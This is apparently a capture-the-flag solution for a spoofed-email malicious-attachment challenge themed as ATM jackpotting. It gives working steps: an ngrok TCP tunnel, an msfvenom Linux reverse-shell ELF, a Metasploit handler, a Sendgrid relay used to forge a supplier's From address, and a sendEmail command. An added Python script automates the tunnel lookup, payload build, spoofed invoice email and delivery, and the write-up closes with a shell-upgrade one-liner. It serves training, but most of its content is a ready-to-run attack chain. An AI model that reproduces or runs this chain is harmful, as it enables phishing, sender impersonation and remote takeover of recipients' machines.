Solution: Email Spoof - Malicious Attachments (ATM Jackpotting)

Tools Used: Ngrok, Metasploit / msfvenom, Sendgrid (via Heroku), sendEmail

The big picture:

  1. We'll expose our local machine's port 443 (where the Metasploit handler will listen) to the internet via Ngrok.
  2. We'll create our malicious attachment with Metasploit / msfvenom.
  3. We'll set up a Sendgrid SMTP relay, and then use it to send our email via the sendEmail command line email client.

Expose our machine's port 443 to the internet with Ngrok

This part's pretty easy. Go to https://ngrok.com/download and click download. Once downloaded, unzip it (and if necessary run `chmod +x ./ngrok`). Ngrok will not open a TCP tunnel until the agent is tied to an account, so run `./ngrok authtoken <your token>` once, then execute it with:
  ./ngrok tcp 443
Here 443 is the local port the tunnel forwards to (the port our Metasploit handler will listen on); ngrok assigns the public host and port itself. You'll see a ngrok status screen come up, and it will show you your public URL and port. Pull out that hostname and port, as we'll be needing them soon - for example, mine was tcp://0.tcp.ngrok.io:19358

Metasploit / msfvenom: Generate malicious attachment

msfvenom --platform linux -p linux/x64/shell/reverse_tcp LHOST=0.tcp.ngrok.io LPORT=19358 -b "\x00" -f elf > ~/Desktop/runme

LHOST and LPORT are the host/port you want the victim to connect back to (in this case, ngrok's public hostname and port, not your own machine's). Replace the LHOST and LPORT from above with your ngrok information.

Two things to be aware of: the staged reverse_tcp stager embeds an IPv4 address, so msfvenom resolves the ngrok hostname when it generates the file - if you restart ngrok and get a different endpoint, regenerate the attachment. The `-b "\x00"` bad-character filter is harmless here but unnecessary, since an ELF file can contain null bytes; it just makes msfvenom run an encoder it does not need to.

chmod 755 ~/Desktop/runme

This only sets the mode on your local copy; an email attachment carries no permission bits, so whatever executes it on the receiving side has to make it executable again.

Now start the handler. The payload must match the one given to msfvenom exactly (a staged stager will not talk to a stageless handler), and LHOST/LPORT here are the local side of the ngrok tunnel, not the public endpoint. Binding port 443 requires root:

msfconsole -q -x "use exploit/multi/handler;set payload linux/x64/shell/reverse_tcp; set LHOST 127.0.0.1; set LPORT 443; run; exit -y"

Setting up an SMTP relay

First we need to get access to an SMTP relay that will let us send an email with the From address of the ATM supplier in the challenge scope, i.e. an address we do not own. The easiest way I've found to do this is with Sendgrid. You may be able to sign up directly with their free account, but what I did is use my Heroku account. In Heroku, create a new application, and add Sendgrid's free tier as a resource. Be aware that Sendgrid now requires you to verify a Single Sender or authenticate the sending domain before it will relay mail from that address, so a freshly created account may refuse an arbitrary From address.

You'll then need to open Sendgrid, and go to Settings / Tracking. Turn "Click Tracking" off; otherwise Sendgrid rewrites every URL in your email to point at its own tracking redirector, which would break any link you put in the message.

Now back in Heroku, if you go to the Settings tab on your application and view the Config Vars, you'll have your SENDGRID_USERNAME and SENDGRID_PASSWORD. We'll need those in a second.

Sending the email

In Kali Linux, open a terminal. We're going to be using the command below, but replacing some things.

sendEmail -u "Invoice Attached" -f ATMSupplier_EMAIL_GOES_HERE -t BankExec_EMAIL_GOES_HERE -s smtp.sendgrid.net:587 -xu SENDGRID_USERNAME_GOES_HERE -xp SENDGRID_PASSWORD_GOES_HERE -m "Your invoice is attached." -a "/root/Desktop/runme"
In the above, replace BankExec_EMAIL_GOES_HERE and ATMSupplier_EMAIL_GOES_HERE with the appropriate email addresses from the challenge scope. Replace SENDGRID_USERNAME_GOES_HERE and SENDGRID_PASSWORD_GOES_HERE with the values you obtained from Sendgrid. Then... just hit enter and send that email. You should see a success message that Sendgrid's SMTP server accepted the email for delivery. If sendEmail instead dies with "invalid SSL_version specified", that is a known incompatibility between sendEmail 1.56 and newer versions of the IO::Socket::SSL Perl module; the usual fix is to edit the sendEmail script so its hard-coded 'SSLv3 TLSv1' version list becomes 'SSLv23:!SSLv2'.
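The three steps above can also be wired together in one script, which sidesteps sendEmail's TLS problems and removes the copy-and-paste of the ngrok endpoint. The following is an added example, not part of the original writeup: it assumes ngrok is running and exposing its local inspection API on 127.0.0.1:4040 (a standard ngrok feature), that msfvenom is on PATH, and that the sender, recipient and Sendgrid credentials are placeholders you replace with the values from the challenge scope and from Heroku.

```python
"""Build the reverse-shell attachment and mail it through Sendgrid.

Added example for the writeup above, not code from the original page.
Assumptions: ngrok is running (`./ngrok tcp 443`) with its inspection API on
127.0.0.1:4040, msfvenom is on PATH, and the addresses/credentials in main()
are placeholders.
"""
import json
import smtplib
import subprocess
import urllib.request
from email.message import EmailMessage
from urllib.parse import urlparse

NGROK_API = "http://127.0.0.1:4040/api/tunnels"  # ngrok's local inspection API
SMTP_HOST, SMTP_PORT = "smtp.sendgrid.net", 587   # same relay as the sendEmail line


def parse_ngrok_url(public_url: str) -> tuple[str, int]:
    """Split a tunnel URL such as tcp://0.tcp.ngrok.io:19358 into (LHOST, LPORT)."""
    u = urlparse(public_url)
    if u.scheme != "tcp" or not u.hostname or not u.port:
        raise ValueError(f"not a tcp tunnel url: {public_url!r}")
    return u.hostname, u.port


def current_ngrok_tunnel() -> str:
    """Ask the running ngrok agent for its public tcp URL (network call)."""
    with urllib.request.urlopen(NGROK_API, timeout=5) as resp:
        tunnels = json.load(resp)["tunnels"]
    for t in tunnels:
        if t.get("proto") == "tcp":
            return t["public_url"]
    raise RuntimeError("no tcp tunnel found; run './ngrok tcp 443' first")


def msfvenom_argv(lhost: str, lport: int, out_path: str) -> list[str]:
    """msfvenom command for the staged x64 reverse shell ELF used in the writeup.

    The stager embeds the resolved IPv4 address of LHOST, so regenerate the
    file whenever the ngrok endpoint changes.  No -b filter: an ELF may
    contain null bytes, so there is nothing to encode around.
    """
    return ["msfvenom", "--platform", "linux", "-p", "linux/x64/shell/reverse_tcp",
            f"LHOST={lhost}", f"LPORT={lport}", "-f", "elf", "-o", out_path]


def build_message(sender: str, recipient: str, subject: str, body: str,
                  attachment_name: str, attachment_bytes: bytes) -> EmailMessage:
    """Compose the spoofed invoice mail with the ELF as a binary attachment."""
    msg = EmailMessage()
    msg["From"] = sender          # the spoofed ATM-supplier address
    msg["To"] = recipient         # the bank exec from the challenge scope
    msg["Subject"] = subject
    msg.set_content(body)
    msg.add_attachment(attachment_bytes, maintype="application",
                       subtype="octet-stream", filename=attachment_name)
    return msg


def send_via_sendgrid(msg: EmailMessage, username: str, password: str) -> None:
    """Relay the message over STARTTLS on 587 with the Sendgrid credentials."""
    with smtplib.SMTP(SMTP_HOST, SMTP_PORT, timeout=30) as smtp:
        smtp.ehlo()
        smtp.starttls()
        smtp.login(username, password)
        smtp.send_message(msg)


def main() -> None:
    host, port = parse_ngrok_url(current_ngrok_tunnel())
    out = "runme"
    subprocess.run(msfvenom_argv(host, port, out), check=True)
    with open(out, "rb") as f:
        payload = f.read()
    msg = build_message("ATMSupplier_EMAIL_GOES_HERE", "BankExec_EMAIL_GOES_HERE",
                        "Invoice Attached", "Your invoice is attached.", out, payload)
    send_via_sendgrid(msg, "SENDGRID_USERNAME_GOES_HERE", "SENDGRID_PASSWORD_GOES_HERE")


if __name__ == "__main__":
    main()
```

Run it after ngrok and the Metasploit handler are up; it reads the tunnel endpoint from ngrok rather than asking you to retype it, so the LHOST/LPORT in the attachment always match the tunnel that is actually open.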

Soon your attachment will be executed by the Bank Exec, and the handler you left running will hand you a shell. In that shell, read the file containing the flag.

To get a nicer command prompt, you can use this in the shell that is popped (use python3 instead of python if the target has no python binary):

python -c "import pty; pty.spawn('/bin/bash');"